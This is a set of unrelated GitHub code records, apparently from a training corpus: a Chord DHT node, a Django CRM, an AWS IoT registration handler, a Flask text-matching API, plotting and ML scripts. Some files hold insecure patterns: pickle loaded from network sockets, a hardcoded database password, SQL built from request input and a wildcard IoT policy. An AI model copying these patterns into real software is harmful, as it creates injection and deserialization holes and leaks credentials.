'port': self.port_number}\n self.predecessor = {'number': self.node, 'port': self.port_number}\n print('Node {} just joined the Chord network and listening on port {}'.format(self.node, self.port_number))\n print(\"--------------Finger table node {} after join:--------------\".format(self.node))\n self.print_finger_table()\n self.print_node_info()\n\n def call_rpc(self, other_node, method, arg1=None, arg2=None):\n \"\"\"\n This function calls other nodes in the network. It performs the rpc and receives the response.\n\n :param other_node: the address of the other nodes\n :param method: the remote function that should be called via rpc\n :param arg1: the first argument for the remote function\n :param arg2: the second argument for the remote function\n :return: the remote function's return value(s) or output\n \"\"\"\n if other_node == self.port_number:\n result = self.dispatch_rpc(method, arg1, arg2)\n return result\n client = ('localhost', other_node)\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as requester:\n requester.settimeout(1500)\n requester.connect(client)\n requester.sendto(pickle.dumps((method, arg1, arg2)), client)\n # print('calling receive & waiting to get result from {} for method {}'.format(other_node, method))\n response = requester.recv(BUF_SZ)\n return pickle.loads(response)\n except Exception as e:\n print(\"I'm node {}, Exception occurred in call function via rpc: {}\".format(self.node, e))\n exit()\n\n def handle_rpc(self, client):\n \"\"\"\n This function handles rpc requests from other nodes in the network and also clients and responds to them.\n\n :param client: is the network node or client that sent the rpc request.\n \"\"\"\n try:\n rpc = client.recv(BUF_SZ)\n method, arg1, arg2 = pickle.loads(rpc)\n result = self.dispatch_rpc(method, arg1, arg2)\n client.sendall(pickle.dumps(result))\n except Exception as e:\n print(\"I'm node {}, Exception occurred in call function via rpc: {}\".format(self.node, e))\n exit()\n\n def dispatch_rpc(self, method, arg1, arg2):\n if method == 'successor':\n return self.successor\n if method == 'update_finger_table':\n # arg1 = node details(identifier) and arg2 = index\n if arg1 is None or arg2 is None:\n print(\"Argument for calling `update_finger_table` method is not provided.\")\n exit()\n else:\n self.update_finger_table(arg1, arg2)\n elif method == 'find_predecessor':\n if arg1['number'] == self.node:\n return self.predecessor\n else:\n return self.find_predecessor(arg1)\n elif method == 'update_your_predecessor':\n if arg1 is None:\n print(\"Argument for calling `update_your_predecessor` method is not provided.\")\n exit()\n self.predecessor = arg1\n elif method == 'find_successor':\n if arg1 is None:\n print(\"Argument for calling `find_successor` method is not provided.\")\n exit()\n return self.find_successor(arg1)\n elif method == 'closest_preceding_finger':\n if arg1 is None:\n print(\"Argument for calling `closest_preceding_finger` method is not provided.\")\n exit()\n return self.closest_preceding_finger(arg1)\n elif method == 'populate':\n if arg1 is None:\n print(\"Argument for calling `save_data` method is not provided.\")\n return \"The row to populate is either missing or incorrect.\"\n return self.save_data(arg1)\n elif method == 'put_key':\n return self.put_key(arg1, arg2)\n elif method == 'query':\n if arg1 is None or arg2 is None:\n print(\"Arguments for calling `get_data` method is not provided.\")\n return \"Pass the player id and year to find the row.\"\n return self.query_data(arg1, arg2)\n elif method == 'get_key':\n return self.get_key(arg1)\n\n @property\n def successor(self):\n return self.finger_table[1].successor\n\n @successor.setter\n def successor(self, id_dic):\n self.finger_table[1].successor = id_dic\n\n def find_successor(self, id):\n \"\"\" Ask this node to find id's successor = successor(predecessor(id))\"\"\"\n node_p = self.find_predecessor(id)\n return self.call_rpc(node_p['port'], 'successor')\n\n def find_predecessor(self, id):\n node_p_number = self.node\n node_p_successor = self.successor\n node_p_port = self.port_number\n while id not in ModRange(node_p_number + 1, node_p_successor['number'] + 1, NODES):\n node_p = self.call_rpc(node_p_port, 'closest_preceding_finger', id) # np = np.closest_preceding_finger(id)\n\n node_p_number = node_p['number']\n node_p_successor = self.call_rpc(node_p_port, 'successor')\n node_p_port = node_p['port']\n\n return {'number': node_p_number, 'port': node_p_port}\n\n def closest_preceding_finger(self, id):\n for i in range(M, 0, -1):\n if self.finger_table[i].successor['number'] in ModRange(self.node + 1, id, NODES):\n return self.finger_table[i].successor\n return {'number': self.node, 'port': self.port_number}\n\n def init_finger_table(self, node_p):\n \"\"\"\n This function updates the values of entries in the finger table of local node.\n It also updates the predecessor.\n\n :param node_p: is an arbitrary node already in the network\n \"\"\"\n self.finger_table[1].successor = self.call_rpc(node_p['port'], 'find_successor', self.finger_table[\n 1].start) # node_p.find_successor(self.finger_table[1].start)\n self.predecessor = self.call_rpc(self.successor['port'], 'find_predecessor',\n self.successor) # self.predecessor = self.successor.predecessor\n self.call_rpc(self.successor['port'], 'update_your_predecessor',\n {'number': self.node, 'port': self.port_number}) # self.successor.predecessor = self.node\n for i in range(1, M):\n if self.finger_table[i + 1].start in ModRange(self.node, self.finger_table[i].successor['number'], NODES):\n # self.node <= self.finger_table[i + 1].start < self.finger_table[i].successor['number']:\n self.finger_table[i + 1].successor = self.finger_table[i].successor\n else:\n self.finger_table[i + 1].successor = self.call_rpc(node_p['port'], 'find_successor', self.finger_table[\n i + 1].start) # node_p.find_successor(self.finger_table[i + 1].start)\n\n def update_finger_table(self, s, i):\n \"\"\"\n This function updates this node's finger table with s, if s is the i-th finger of it\n :param s: new node for entry i\n :param i: the index of finger table\n \"\"\"\n if self.finger_table[i].start != self.finger_table[i].successor['number'] \\\n and s['number'] in \\\n ModRange(self.finger_table[i].start, self.finger_table[i].successor['number'], NODES):\n self.finger_table[i].successor = s\n p = self.predecessor # get first node preceding this local node\n self.call_rpc(p['port'], 'update_finger_table', s, i)\n print(\"--------------Finger table node {} after update:--------------\".format(self.node))\n self.print_finger_table()\n self.print_node_info()\n\n def update_others(self):\n \"\"\"\n This function updates all nodes whose finger tables should refer to this local node\n \"\"\"\n for i in range(1, M + 1):\n # find the last node p whose i-th finger might be this local node\n node_p = self.find_predecessor((1 + self.node - 2 ** (i - 1) + NODES) % NODES)\n # node_p.update_finger_table(self.node, i)\n self.call_rpc(node_p['port'], 'update_finger_table', {'number': self.node, 'port': self.port_number}, i)\n\n def put_key(self, key_id, key_value):\n \"\"\"\n This function updates the keys dictionary and adds or stores the new item given by the populate request.\n\n :return: True, indicates the pair successfully added\n \"\"\"\n self.keys[key_id] = key_value\n self.print_keys_dictionary()\n self.print_node_info()\n return True\n\n def get_key(self, key_id):\n \"\"\"\n This function replies to the query question by returning the data row in the\n keys dictionary for 'key_id,' or None if the keys dictionary does not contain\n a pair with key equal to the input id.\n \"\"\"\n if key_id not in self.keys.keys():\n print(\"This id is not available in node {} keys dictionary\".format(self.node))\n return None\n return self.keys[key_id]\n\n def save_data(self, input):\n \"\"\"\n This function save the input row in the appropriate node of the Chord network.\n As identifier or key of this row, the node uses the value in the first column (player id) concatenated\n with the value in the fourth column (year).\n :param input: data row in list format\n :return: a string describing the result of populating the input data row\n \"\"\"\n row = input\n player_id = row[0]\n year = row[3]\n data_id = sha1_hash(str(player_id) + str(year))\n bucket_id = data_id % 2 ** M\n responsible = self.call_rpc(self.port_number, 'find_successor', bucket_id)\n done = self.call_rpc(responsible['port'], 'put_key', data_id, row)\n if done:\n return \"Node {} saved the row\".format(responsible['number'])\n else:\n return \"Populate failed\"\n\n def query_data(self, player_id, year):\n \"\"\"\n This function finds the node in charge of keeping a row with the given\n player id and year and retrieves the row from that node.\n\n :param player_id: first part of the identifier for a row\n :param year: second part of the identifier for a row\n :return: a row or a string describing the result of query result\n \"\"\"\n data_id = sha1_hash(str(player_id) + str(year))\n bucket_id = data_id % 2 ** M\n responsible = self.call_rpc(self.port_number, 'find_successor', bucket_id)\n try:\n row = self.call_rpc(responsible['port'], 'get_key', data_id)\n if row is None:\n return \"Data is not available.\"\n if isinstance(row, list):\n return row\n else:\n return \"Query failed!\"\n except Exception as e:\n print(\"Query failed! Error = {}\".format(e))\n return \"Query failed!\"\n\n def print_finger_table(self):\n for entry in self.finger_table:\n if entry is None:\n continue\n print(\"entry.start = {} \\t entry.stop = {} \\t entry.successor = {} \\t \"\n .format(entry.start, entry.interval.stop,\n entry.successor))\n\n def print_node_info(self):\n print('[{}] Node {} is listening on port {}'.format(datetime.now().strftime(\"%I:%M:%S.%f\"), self.node,\n self.port_number))\n print('\\tsuccessor = {}\\t\\tpredecessor = {}'.format(self.successor['number'], self.predecessor['number']))\n\n def print_keys_dictionary(self):\n print(\"-------------- Keys in node {} --------------\".format(self.node))\n for key, value in self.keys.items():\n player_id = value[0]\n year = value[3]\n data_id = sha1_hash(str(player_id) + str(year))\n bucket_id = data_id % 2 ** M\n print('\\t\\t', bucket_id, ' : ', value[0])\n\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n node_port = int(args[0])\n ChordNode(node_port)\n","repo_name":"lmirzaei/distributed-systems-projects","sub_path":"Lab4_DHT/chord_node.py","file_name":"chord_node.py","file_ext":"py","file_size_in_byte":22869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27131557112","text":"#!/usr/bin/env python3\n\n# powerful runtime error reporting mechanism\n# last line we have the error and everything is called as the tarce back\nimport sys\n# we can import sys for extra info about the error using sys.exec_info()\ndef main():\n try:\n x = int('foo')\n except ValueError:\n print(f'I caught a value error: {sys.exc_info()}')\n except ZeroDivisionError:\n print('dont divide by zero')\n except:\n print('Unknown error')\n # so we can capture the error and the execution will continue without problem\n print('Hello, World.')\n\nif __name__ == '__main__': main()","repo_name":"rudyredhat/PyEssTrainingLL","sub_path":"Ch07/07_01/exception-one.py","file_name":"exception-one.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18669201864","text":"import sys\nimport xarray as xr\nimport dask\nimport dask.array as da\nimport netCDF4\nimport numpy as np\nfrom importlib import reload\nimport matplotlib as mpl\nfrom matplotlib import cm\nimport matplotlib.colors as colors\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib.colors import LinearSegmentedColormap\nimport pandas as pd\nimport regionmask\nimport cartopy.crs as ccrs\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# PATHS\nSM_PATH = '../XAI/data/'\nFIGS_PATH = './figs/'\n\n# IPCC Regions\nregions = ['NWN', 'NEN', 'WNA', 'CNA', 'ENA', 'NCA']\nregionsToRemove = ['SCA', 'CAR']\n\n# Models\nmodels = ['CNN10', 'CNN10_stand',\n 'CNNPan', 'CNN_UNET']\n\nnamesPlot = {'CNN10': 'DeepESD',\n 'CNN10_stand': 'DeepESD-Stand',\n 'CNNPan': 'CNN-PAN',\n 'CNN_UNET': 'CNN-UNET'}\n\n# Neurons\nidxNeuron = ['2000', '5950']\n\n# Vars to plot\nvarsToPlot = ['ta@1000', 'hus@1000']\n\n# Vars and heights dicts\nallVars = ['z@500', 'z@700', 'z@850', 'z@1000',\n 'hus@500', 'hus@700', 'hus@850', 'hus@1000',\n 'ta@500', 'ta@700', 'ta@850', 'ta@1000',\n 'ua@500', 'ua@700', 'ua@850', 'ua@1000',\n 'va@500', 'va@700', 'va@850', 'va@1000']\n\n# Initialize figure\nnRows = len(models)\n\nfig = plt.figure(figsize = (30, 20))\nouter = gridspec.GridSpec(nRows, 1,\n wspace = -0.9, hspace = -0.1)\n\nimportanceMin = 0.1\nimportanceMax = 0.7\ncolorSchema = 'magma_r'\ncmap = plt.get_cmap(colorSchema)\ncmap.set_under('white')\n\n# IPCC Regions\nar6 = regionmask.defined_regions.ar6.all\nnorthAmerica = ar6[regions]\n\n# Dict defining coords to print region mean values\ndictCoord = {'NWN': [0.4, 0.85],\n 'NEN': [0.8, 0.85],\n 'WNA': [0.45, 0.55],\n 'CNA': [0.65, 0.55],\n 'ENA': [0.8, 0.5],\n 'NCA': [0.57, 0.25],\n 'SCA': [0.69, 0.1],\n 'CAR': [0.89, 0.1]}\n\n# Iterate over subplots\ngeneralRow = 0\nfor model in models:\n\n # Initialize inner plot\n inner = gridspec.GridSpecFromSubplotSpec(1, len(varsToPlot) * len(idxNeuron),\n subplot_spec = outer[generalRow],\n wspace = 0.1, hspace = 0.1)\n\n # Plot Saliency Maps\n innerCol = 0\n\n for var in varsToPlot:\n for neuron in idxNeuron:\n\n # Load Saliency Map\n nameSM = 'SMtrainSet_' + model + '_neuron' + str(neuron) + '.npy'\n saliencyMaps = np.load(SM_PATH + nameSM)\n\n # Compute mean of saliency maps\n saliencyMaps = np.mean(saliencyMaps, axis=0)\n\n # Idx of variable\n combIdx = allVars.index(var)\n\n # Inner\n axes = plt.Subplot(fig, inner[0, innerCol])\n\n if innerCol == 0:\n axes.set_ylabel(namesPlot[model], fontsize = 16, weight = 'bold')\n\n # Compute subplot\n map = Basemap(ax = axes,\n llcrnrlon = -164.75, llcrnrlat = 11.75,\n urcrnrlon = -59.75, urcrnrlat = 69.75,\n resolution = 'c')\n\n im = map.imshow(saliencyMaps[:, :, combIdx],\n vmin = importanceMin, vmax = importanceMax,\n cmap = cmap)\n\n map.drawcoastlines(linewidth = 0.2, color = 'gray')\n\n fig.add_subplot(axes)\n\n innerCol = innerCol + 1\n\n # Saliency maps colorbar\n cbar_ax = fig.add_axes([0.36, 0.08, 0.3, 0.012])\n cb = fig.colorbar(im, cax = cbar_ax, orientation = 'horizontal',\n extend = 'min')\n cb.ax.xaxis.set_ticks_position('top')\n cb.ax.tick_params(labelsize = 24)\n cb.set_label(label = 'Relevance (unitless)', fontsize = 26)\n\n generalRow = generalRow + 1\n\n# Cols title\nfig.text(0.255-0.055, 0.9, 'Air temperature (1000 hPa)',\n fontsize = 36)\nfig.text(0.175, 0.86, 'North Point',\n fontsize = 28)\nfig.text(0.375, 0.86, 'South Point',\n fontsize = 28)\n\nfig.text(0.65-0.065, 0.9, 'Specific Humidity (1000 hPa)',\n fontsize = 36)\nfig.text(0.57, 0.86, 'North Point',\n fontsize = 28)\nfig.text(0.77, 0.86, 'South Point',\n fontsize = 28)\n\nplt.savefig(FIGS_PATH + 'figSM_train.pdf',\n dpi = 300, bbox_inches = 'tight')","repo_name":"jgonzalezab/XAI-Statistical-Downscaling","sub_path":"figures/figSMs.py","file_name":"figSMs.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3835403813","text":"import tensorflow as tf\n\n\ndef pairwise_ranking_crossentropy_loss(y_true, y_pred):\n \"\"\"\n :@param y_true: [batch = target_betweenness | src_ids | tgt_ids]\n :@param y_pred: [batch = pred_betweenness]\n The original DrBC implementation uses 5*N src_id,tgt_id pairs from a graph of N nodes\n \"\"\"\n pred_betweenness = y_pred\n target_betweenness = tf.slice(y_true, begin=(0, 0), size=(-1, 1))\n src_ids = tf.cast(tf.reshape(tf.slice(y_true, begin=(0, 1), size=(-1, 5)), (-1,)), 'int32')\n tgt_ids = tf.cast(tf.reshape(tf.slice(y_true, begin=(0, 6), size=(-1, 5)), (-1,)), 'int32')\n\n labels = tf.nn.embedding_lookup(target_betweenness, src_ids) - tf.nn.embedding_lookup(target_betweenness, tgt_ids)\n preds = tf.nn.embedding_lookup(pred_betweenness, src_ids) - tf.nn.embedding_lookup(pred_betweenness, tgt_ids)\n return tf.nn.sigmoid_cross_entropy_with_logits(logits=preds, labels=tf.sigmoid(labels))\n","repo_name":"MartinXPN/DrBC","sub_path":"drbc/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8373775631","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom prewikka import registrar, usergroup\n\n\nclass CLIManager(object):\n def __init__(self):\n self._commands = {}\n\n def _register(self, command, category, method, permissions, help, **options):\n d = self._commands.setdefault(command, {})\n if category not in d:\n # Avoid replacing methods by the ones from children classes\n d[category] = (method, permissions, help, options)\n\n def register(self, command, category, method=None, permissions=[], help=None, **options):\n usergroup.ALL_PERMISSIONS.declare(permissions)\n\n if method:\n self._register(command, category, method, permissions, help, **options)\n else:\n return registrar.DelayedRegistrar.make_decorator(\"cli\", self._register, command, category, permissions=permissions, help=help, **options)\n\n def unregister(self, command=None, category=None):\n if command and category:\n self._commands[command].pop(category)\n elif command:\n self._commands.pop(command)\n else:\n self._commands = {}\n\n def get(self, command):\n return self._commands.get(command, {})\n\n\ncli = CLIManager()\nget = cli.get\nregister = cli.register\nunregister = cli.unregister\n","repo_name":"Prelude-SIEM/prewikka","sub_path":"prewikka/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"36355193284","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the closestNumbers function below.\ndef closestNumbers(arr):\n arr.sort()\n diff=[]\n for i in range(1, len(arr)):\n diff.append(arr[i]-arr[i-1])\n p= diff.index(min(diff))\n pl=[]\n pl.append(p)\n arr1=[]\n\n for j in range(len(diff)):\n if j!=p:\n if diff[j]==diff[p]:\n pl.append(j)\n for x in pl:\n arr1.append(arr[x])\n arr1.append(arr[x+1])\n return arr1\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n result = closestNumbers(arr)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"shkhrkat/HackerRank-solutions","sub_path":"Closest_Numbers.py","file_name":"Closest_Numbers.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6888570049","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\nnp.random.seed(1)\nfig = plt.figure(figsize=(4, 4), facecolor='white')\nax = fig.add_axes([0,0,1,1], frameon=False)\n\n# Generate random data\ndata = np.random.uniform(0, 1, (64, 100))\nX = np.linspace(-1, 1, data.shape[-1])\nG = 1.5 * np.exp(-4 * X ** 2)\n\n# Generate line plots\nlines = []\nfor i in range(len(data)):\n # Small reduction of the X extents to get a cheap perspective effect\n xscale = 1 - i / 200.\n # Same for linewidth (thicker strokes on bottom)\n lw = 1. - i / 100.0\n line, = ax.plot(xscale * X, i + G * data[i], color=\"black\", lw=lw)\n lines.append(line)\n\n# Set y limit (to avoid cropping because of thickness)\nax.set_ylim(-2, 65)\nax.set_xticks([])\nax.set_yticks([])\n\ndef update(*args):\n # Shift all data to the right\n data[:, 1:] = data[:, :-1]\n\n # Fill-in new values\n data[:, 0] = np.random.uniform(0, 1, len(data))\n\n # Update data\n for i in range(len(data)):\n lines[i].set_ydata(i + G * data[i])\n\n # Return modified artists\n return lines\n\nanim = animation.FuncAnimation(fig, update, frames=100, interval=20)\nanim.save('unknown-pleasures.gif', writer='imagemagick', fps=60)\nplt.show()\n","repo_name":"rougier/unknown-pleasures","sub_path":"unknown-pleasures.py","file_name":"unknown-pleasures.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"72695735914","text":"from django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views import generic\nfrom django.db.utils import IntegrityError\nfrom marketing.models import Interaksi\nfrom marketing.forms import InteraksiForm\n\n\nclass InteraksiListView(generic.ListView):\n queryset = Interaksi.objects.all().order_by(\"-created_at\")\n template_name = \"marketing/interaksi_list.html\"\n\n\n@staff_member_required(login_url=\"accounts:login\")\ndef createInteraksi(request):\n if request.method == \"POST\":\n if request.POST[\"no_hp\"]:\n # format no hp to 62xxx\n request.POST[\"no_hp\"][0][1:].replace(\" \", \"\").replace(\"-\", \"\")\n request.POST._mutable = True\n if request.POST[\"no_hp\"].startswith(\"0\"):\n request.POST[\"no_hp\"] = \"62\" + request.POST[\"no_hp\"][1:].replace(\n \" \", \"\"\n ).replace(\"-\", \"\")\n elif request.POST[\"no_hp\"].startswith(\"+\"):\n request.POST[\"no_hp\"] = (\n request.POST[\"no_hp\"][1:].replace(\" \", \"\").replace(\"-\", \"\")\n )\n elif request.POST[\"no_hp\"].startswith(\"6\"):\n request.POST[\"no_hp\"] = (\n request.POST[\"no_hp\"].replace(\" \", \"\").replace(\"-\", \"\")\n )\n\n form = InteraksiForm(request.POST)\n if form.is_valid():\n interaksi = form.save(commit=False)\n interaksi.tim_marketing = request.user\n try:\n interaksi.save()\n except IntegrityError:\n messages.error(request, \"Data sudah ada pada hari ini\")\n return redirect(\"marketing:list_interaksi\")\n\n messages.success(request, \"Interaksi berhasil ditambahkan\")\n return redirect(\"marketing:list_interaksi\")\n else:\n form = InteraksiForm()\n\n return render(\n request,\n \"marketing/add_interaksi.html\",\n {\"form\": form, \"title\": \"Add Interaksi\"},\n )\n\n\n@staff_member_required(login_url=\"accounts:login\")\ndef editInteraksi(request, pk):\n interaksi = get_object_or_404(Interaksi, pk=pk)\n if request.method == \"POST\":\n form = InteraksiForm(request.POST, instance=interaksi)\n if form.is_valid():\n form.save()\n messages.success(request, \"Pendaftaran berhasil di edit!\")\n return redirect(\"marketing:list_interaksi\")\n else:\n form = InteraksiForm(instance=interaksi)\n\n context = {\"form\": form, \"title\": \"Update Interaksi\"}\n return render(request, \"marketing/add_interaksi.html\", context)\n\n\n@staff_member_required(login_url=\"accounts:login\")\ndef delete_interaksi(request, pk):\n interaksi = get_object_or_404(Interaksi, pk=pk)\n interaksi.delete()\n messages.success(request, \"Interaksi berhasil di hapus\")\n return redirect(\"marketing:list_interaksi\")\n\n\n@staff_member_required(login_url=\"accounts:login\")\ndef interaksi_bulanan(request):\n return render(request, \"marketing/interaksi_graph.html\")\n","repo_name":"ArRosid/idn-dashboard","sub_path":"marketing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6972998387","text":"import nltk\nimport langid\nimport numpy as np\nfrom prepare import removeStop\nfrom prepare import removeNer\nfrom sentiClassify import sentiment\n\n\npath = r'data/stopwords.txt'\n\n# 对一篇文章中的每段进行相关的情感分析之后进行\ncount = int(1)\nres_pos = []\nres_neg = []\nres_neu = []\nfor i in nlp_data:\n print(count)\n str1 = flatten_str(i)\n tokens = nltk.word_tokenize(str1)\n rm = removeStop(tokens, path)\n rm_s = rm.remove_stoplist()\n\n test = removeNer(rm_s)\n input_sent = test.remove_ner()\n res_sent = sentiment(input_sent)\n res_pos.append(res_sent['pos'])\n res_neg.append(res_sent['neg'])\n res_neu.append(res_sent['neu'])\n count += 1\n\n\n\n# ---nltk中进行的人名,地点提取\nres_person = []\nres_location =[]\nfor i in nlp_data:\n str1 = flatten_str(i)\n tokens = nltk.word_tokenize(str1)\n rm = removeStop(tokens, path)\n rm_s = rm.remove_stoplist()\n\n aaa = removeNer(rm_s)\n person = aaa.get_person()\n location = aaa.get_loaction()\n res_person.append(person)\n res_location.append(location)\n\nfrom collections import Counter\n# 去除重复值进行\ndef most_list(res_person):\n a =Counter(res_person)\n temp =a.most_common(3)\n person3 =[i[0] for i in temp]\n return person3\n\nres_person1 = [most_list(i) for i in res_person]\nres_location1 = [most_list(i) for i in res_location]\n\nres_person1 = [\",\".join(list(set(i))) for i in res_person1]\nres_location1 = [\",\".join(list(set(i))) for i in res_location1]\n\n\n\n# ---进行后面的鬼鬼,数据合并\n\ndef na_replace(list_np):\n rd2 = [round(i*100,2) for i in list_np]\n temp = np.array(rd2)\n index_nan = np.isnan(temp)\n index_inf = np.isinf(temp)\n temp[index_nan] = float(0)\n temp[index_inf] = float(0)\n out_list = [i.item() for i in temp]\n return out_list\n\nres_pos1 = na_replace(res_pos)\nres_neu1 = na_replace(res_neu)\nres_neg1 = na_replace(res_neg)\n\ntt = zip(res_pos1, res_neu1, res_neg1, top5, res_person1, res_location1, sim_where, article)\nto_sql = list(tt)\n\n\n\n","repo_name":"goal1234/nlp","sub_path":"lie/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28712217152","text":"import os\nimport json\n\n\nclass Jit(object):\n def __init__(self, event, context, iot):\n self.event = event\n self.context = context\n self.iot = iot\n\n def _certificate_arn(self):\n aws_region = os.getenv('AWS_REGION')\n aws_account_id = self.event.get('awsAccountId')\n certificate_id = self.event.get('certificateId')\n\n return f'arn:aws:iot:{aws_region}:{aws_account_id}:cert/{certificate_id}'\n\n def _iot_policy(self):\n return json.dumps({\n 'Version': '2012-10-17',\n 'Statement': [\n {\n 'Effect': 'Allow',\n 'Action': [\n 'iot:Publish',\n 'iot:Receive',\n 'iot:Subscribe',\n 'iot:Connect'\n ],\n 'Resource': '*'\n }\n ]\n })\n\n def _iot_policy_name(self):\n return f'{self.event.get(\"certificateId\")}-policy'\n\n def _create_iot_policy(self):\n return self.iot.create_policy(policyName=self._iot_policy_name(),\n policyDocument=self._iot_policy())\n\n def _does_iot_policy_exist(self):\n policies = self.iot.list_policies().get('policies')\n\n for policy in policies:\n if policy.get('policyName') == self._iot_policy_name():\n return True\n return False\n\n def _update_iot_certificate(self):\n self.iot.update_certificate(certificateId=self.event.get('certificateId'),\n newStatus='ACTIVE')\n\n def _attach_iot_policy(self):\n self.iot.attach_policy(policyName=self._iot_policy_name(),\n target=self._certificate_arn())\n\n def main(self):\n try:\n if not self._does_iot_policy_exist():\n self._create_iot_policy()\n self._attach_iot_policy()\n self._update_iot_certificate()\n except Exception as e:\n print(e)\n","repo_name":"knakayama/aws-iot-playground","sub_path":"jit/src/handlers/jit/jit.py","file_name":"jit.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30201635280","text":"# -*-coding:utf-8-*-\nimport jieba.analyse\nimport numpy as np\nfrom flask import Flask, request, jsonify\nimport ast\nimport pymysql\nimport jieba\n\napp = Flask(__name__)\njieba.initialize() # 手动初始化\njieba.load_userdict(\"./vocab.txt\")\njieba.enable_parallel(4)\nwith open('../data_helper/stopwords.txt', 'r') as f:\n stopwords = [word.replace('\\n', '') for word in f.readlines()]\n\n\ndef inspection_spec_relation_DB(inspection_name):\n db = pymysql.connect(host=\"172.30.2.231\", user=\"zhangziang\",\n password=\"Dzjzza*2022\", database=\"hrs\", port=3306, autocommit=False)\n sql = f\"select * from inspection_spec_relation where name = '{inspection_name}'\"\n cursor = db.cursor()\n row_count = cursor.execute(sql)\n\n return cursor\n\n\ndef sim(keywords1, keywords2):\n # jaccard\n intersection = len(list(set(keywords1).intersection(set(keywords2))))\n sample_len = min(len(keywords1), len(keywords2))\n # union = len(list(set(keywords_sample).union(set(keywords2_match))))\n # 除零处理\n # sim = float(intersection) / union if union != 0 else 0\n sim = float(intersection) / sample_len if sample_len != 0 else 0\n if sim > 0.6:\n return True\n else:\n return False\n\n\ndef inspection_calculate(input_inspectionName, inspection_value, DB_data):\n name = DB_data[1]\n data_type = DB_data[2]\n operator = DB_data[3]\n min_value = float(DB_data[4]) if DB_data[4] is not None else None\n max_value = float(DB_data[5]) if DB_data[5] is not None else None\n unique_code = DB_data[6]\n\n assert input_inspectionName == name\n assert data_type == 'NUMBER'\n\n if operator == \"EQUALS\":\n if min_value is None:\n return None\n elif inspection_value == min_value:\n return unique_code\n else:\n return None\n elif operator == \"GREATER_EQUAL\":\n if max_value is None:\n return None\n elif inspection_value >= max_value:\n return unique_code\n else:\n return None\n elif operator == \"LESS_EQUAL\":\n if min_value is None:\n return None\n elif inspection_value <= min_value:\n return unique_code\n else:\n return None\n elif operator == \"LESS\":\n if min_value is None:\n return None\n elif inspection_value < min_value:\n return unique_code\n else:\n return None\n elif operator == \"GREATER\":\n if max_value is None:\n return None\n elif inspection_value > max_value:\n return unique_code\n else:\n return None\n elif operator == \"RANGE\":\n if min_value is None or max_value is None:\n return None\n elif min_value < inspection_value < max_value:\n return unique_code\n else:\n return None\n else:\n return None\n\n\n@app.route(\"/wm_semantic_sim\", methods=[\"POST\"])\ndef semantic_sim():\n data = request.get_json()\n result = {'unique_code': []}\n for input_inspectionName in data:\n try:\n inspection_value = float(data[input_inspectionName])\n for DB_data in inspection_spec_relation_DB(input_inspectionName).fetchall():\n unique_code = inspection_calculate(input_inspectionName, inspection_value, DB_data)\n if unique_code is not None:\n result['unique_code'].append(unique_code)\n else:\n continue\n except Exception:\n input_inspection_value = str(data[input_inspectionName])\n cut_input = [word for word in jieba.cut(input_inspection_value) if word not in stopwords]\n keyword_input = jieba.analyse.extract_tags(\"|\".join(cut_input), topK=200, withWeight=False)\n for DB_data in inspection_spec_relation_DB(input_inspectionName).fetchall():\n cut_DB = [word for word in jieba.cut(DB_data[4]) if word not in stopwords]\n keyword_DB = jieba.analyse.extract_tags(\"|\".join(cut_DB), topK=200, withWeight=False)\n if sim(keyword_input, keyword_DB) is True:\n result['unique_code'].append(DB_data[6])\n else:\n continue\n return jsonify(result)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', threaded=True, port=5003)\n","repo_name":"274349293/MedBrain","sub_path":"text_sim/wm_sim/wm_semantic_match_API.py","file_name":"wm_semantic_match_API.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71208641832","text":"#--------------------------------------------------------\n# LibUnits.py - Define system of units OpenSees model\n# Code: II\n#--------------------------------------------------------\n# base units (SI units)\nm = 1\nkg = 1\ns = 1\n# other units\nN = kg*m/s**2\ncm = 0.01*m\nPa = N/m**2\nksi = 6894757.2932*Pa\nkgf = 9.8066*N\nMPa = 10**6*Pa\npsi = 6894.76*Pa\n# physical constants\ng = 